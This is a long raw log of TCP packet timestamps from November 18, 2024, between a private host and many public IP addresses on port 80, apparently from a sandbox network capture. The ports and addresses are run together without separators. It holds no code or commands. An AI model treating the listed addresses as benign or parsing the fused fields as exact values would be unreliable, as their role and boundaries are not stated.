                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:21.443191051 CET805008318.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:21.443317890 CET5008380192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:21.443382978 CET5008380192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:21.443402052 CET5008380192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:21.448333979 CET805008318.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:21.448343992 CET805008318.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:21.643335104 CET5008480192.168.2.1034.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:21.837213993 CET805008434.246.200.160192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:21.837377071 CET5008480192.168.2.1034.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:21.837865114 CET5008480192.168.2.1034.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:21.837865114 CET5008480192.168.2.1034.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:21.842796087 CET805008434.246.200.160192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:21.842811108 CET805008434.246.200.160192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:22.012284994 CET5002680192.168.2.10208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:22.022365093 CET8050026208.100.26.245192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:22.022418976 CET5002680192.168.2.10208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:22.316319942 CET805008318.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:22.316508055 CET5008380192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:22.321949005 CET805008318.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:22.322074890 CET5008380192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:22.489453077 CET5008580192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:22.494469881 CET805008518.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:22.494537115 CET5008580192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:22.507057905 CET5008580192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:22.507111073 CET5008580192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:22.512150049 CET805008518.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:22.512221098 CET805008518.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:22.814475060 CET805008434.246.200.160192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:22.833930016 CET5008480192.168.2.1034.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:22.839373112 CET805008434.246.200.160192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:22.839557886 CET5008480192.168.2.1034.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:23.164974928 CET5008680192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:23.169853926 CET805008647.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:23.169996977 CET5008680192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:23.170159101 CET5008680192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:23.170159101 CET5008680192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:23.170321941 CET805008518.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:23.174489975 CET5008580192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:23.175009966 CET805008647.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:23.175054073 CET805008647.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:23.180093050 CET805008518.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:23.180155039 CET5008580192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:23.187575102 CET5008780192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:23.192640066 CET805008713.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:23.192718983 CET5008780192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:23.192809105 CET5008780192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:23.192809105 CET5008780192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:23.197649956 CET805008713.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:23.197737932 CET805008713.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:23.454215050 CET5008680192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:23.514930964 CET5008880192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:23.520108938 CET805008847.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:23.520215988 CET5008880192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:23.520540953 CET5008880192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:23.520540953 CET5008880192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:23.525535107 CET805008847.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:23.525568962 CET805008847.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:24.636329889 CET805008713.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:24.636660099 CET5008780192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:24.642111063 CET805008713.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:24.644246101 CET5008780192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:24.650930882 CET5008980192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:24.656003952 CET805008913.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:24.659653902 CET5008980192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:24.659861088 CET5008980192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:24.659893990 CET5008980192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:24.664760113 CET805008913.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:24.664773941 CET805008913.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:24.980665922 CET805008847.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:24.985508919 CET5008880192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:24.990971088 CET805008847.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:24.991036892 CET5008880192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:25.373539925 CET5009080192.168.2.103.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:25.378637075 CET80500903.94.10.34192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:25.378717899 CET5009080192.168.2.103.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:25.379667044 CET5009080192.168.2.103.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:25.379697084 CET5009080192.168.2.103.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:25.384541988 CET80500903.94.10.34192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:25.384572029 CET80500903.94.10.34192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:26.048280954 CET80500903.94.10.34192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:26.048465967 CET5009080192.168.2.103.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:26.054565907 CET80500903.94.10.34192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:26.054653883 CET5009080192.168.2.103.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:26.102804899 CET805008913.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:26.102977991 CET5008980192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:26.108561993 CET805008913.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:26.108633995 CET5008980192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:26.118742943 CET5009180192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:26.123747110 CET805009134.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:26.123823881 CET5009180192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:26.123914957 CET5009180192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:26.123929977 CET5009180192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:26.128848076 CET805009134.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:26.128859997 CET805009134.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:26.551805019 CET5009280192.168.2.1035.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:26.557811975 CET805009235.164.78.200192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:26.557889938 CET5009280192.168.2.1035.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:26.558059931 CET5009280192.168.2.1035.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:26.558084965 CET5009280192.168.2.1035.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:26.563170910 CET805009235.164.78.200192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:26.563183069 CET805009235.164.78.200192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:26.955321074 CET805009134.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:26.955521107 CET5009180192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:26.960829020 CET805009134.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:26.960884094 CET5009180192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:26.969769955 CET5009380192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:26.974854946 CET805009347.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:26.974920988 CET5009380192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:26.975003958 CET5009380192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:26.975023985 CET5009380192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:26.979927063 CET805009347.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:26.980005980 CET805009347.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:27.396711111 CET805009235.164.78.200192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:27.449558973 CET5009280192.168.2.1035.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:27.516130924 CET805009235.164.78.200192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:27.516199112 CET5009280192.168.2.1035.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:27.527076960 CET5009280192.168.2.1035.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:27.532059908 CET805009235.164.78.200192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:27.737018108 CET5009480192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:27.742048979 CET805009418.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:27.742127895 CET5009480192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:27.742353916 CET5009480192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:27.742393017 CET5009480192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:27.747188091 CET805009418.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:27.747287035 CET805009418.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:28.450325012 CET805009347.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:28.450587988 CET5009380192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:28.456235886 CET805009347.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:28.456309080 CET5009380192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:28.463229895 CET5009580192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:28.468256950 CET805009513.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:28.468374968 CET5009580192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:28.468466043 CET5009580192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:28.468481064 CET5009580192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:28.473516941 CET805009513.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:28.473537922 CET805009513.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:29.193000078 CET805009418.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:29.193427086 CET5009480192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:29.200072050 CET805009418.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:29.200150013 CET5009480192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:29.372359991 CET5009680192.168.2.10208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:29.378846884 CET8050096208.100.26.245192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:29.378997087 CET5009680192.168.2.10208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:29.379503965 CET5009680192.168.2.10208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:29.379503965 CET5009680192.168.2.10208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:29.384382963 CET8050096208.100.26.245192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:29.384394884 CET8050096208.100.26.245192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:29.910023928 CET805009513.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:29.965204954 CET5009580192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:29.965796947 CET5009580192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:29.973206997 CET805009513.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:29.973303080 CET5009580192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:29.979640961 CET5009780192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:29.985018969 CET805009734.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:29.985135078 CET5009780192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:29.986210108 CET5009780192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:29.986228943 CET5009780192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:29.991276979 CET805009734.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:29.991297960 CET805009734.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:30.024719954 CET8050096208.100.26.245192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:30.074539900 CET5009680192.168.2.10208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:30.224678040 CET5009680192.168.2.10208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:30.224678040 CET5009680192.168.2.10208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:30.229707003 CET8050096208.100.26.245192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:30.229741096 CET8050096208.100.26.245192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:30.371562958 CET8050096208.100.26.245192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:30.418308020 CET5009680192.168.2.10208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:30.821733952 CET5009880192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:30.827163935 CET805009844.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:30.827245951 CET5009880192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:30.827760935 CET5009880192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:30.827819109 CET5009880192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:30.829483986 CET805009734.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:30.829639912 CET5009780192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:30.833090067 CET805009844.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:30.833103895 CET805009844.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:30.835553885 CET805009734.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:30.835602999 CET5009780192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:30.841788054 CET5009980192.168.2.103.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:30.846786022 CET80500993.94.10.34192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:30.846870899 CET5009980192.168.2.103.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:30.847132921 CET5009980192.168.2.103.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:30.847132921 CET5009980192.168.2.103.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:30.853105068 CET80500993.94.10.34192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:30.853118896 CET80500993.94.10.34192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:31.522224903 CET805009844.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:31.537281990 CET5009880192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:31.542630911 CET80500993.94.10.34192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:31.542828083 CET5009980192.168.2.103.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:31.543262005 CET805009844.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:31.543327093 CET5009880192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:31.548640966 CET80500993.94.10.34192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:31.548700094 CET5009980192.168.2.103.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:31.579000950 CET5010080192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:31.584964037 CET805010018.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:31.585030079 CET5010080192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:31.597117901 CET5010080192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:31.597150087 CET5010080192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:31.602160931 CET805010018.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:31.602279902 CET805010018.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:31.843369007 CET5010180192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:31.848913908 CET805010134.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:31.849008083 CET5010180192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:31.849193096 CET5010180192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:31.849193096 CET5010180192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:31.855341911 CET805010134.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:31.855365038 CET805010134.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:32.443185091 CET805010018.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:32.443406105 CET5010080192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:32.449455023 CET805010018.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:32.449660063 CET5010080192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:32.464534998 CET5010280192.168.2.103.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:32.470247984 CET80501023.254.94.185192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:32.470716953 CET5010280192.168.2.103.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:32.470851898 CET5010280192.168.2.103.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:32.470865965 CET5010280192.168.2.103.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:32.476528883 CET80501023.254.94.185192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:32.476547003 CET80501023.254.94.185192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:32.740752935 CET805010134.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:32.741022110 CET5010180192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:32.746651888 CET805010134.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:32.746728897 CET5010180192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:33.036477089 CET5010380192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:33.041718006 CET805010318.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:33.041791916 CET5010380192.168.2.1018.208.156.248
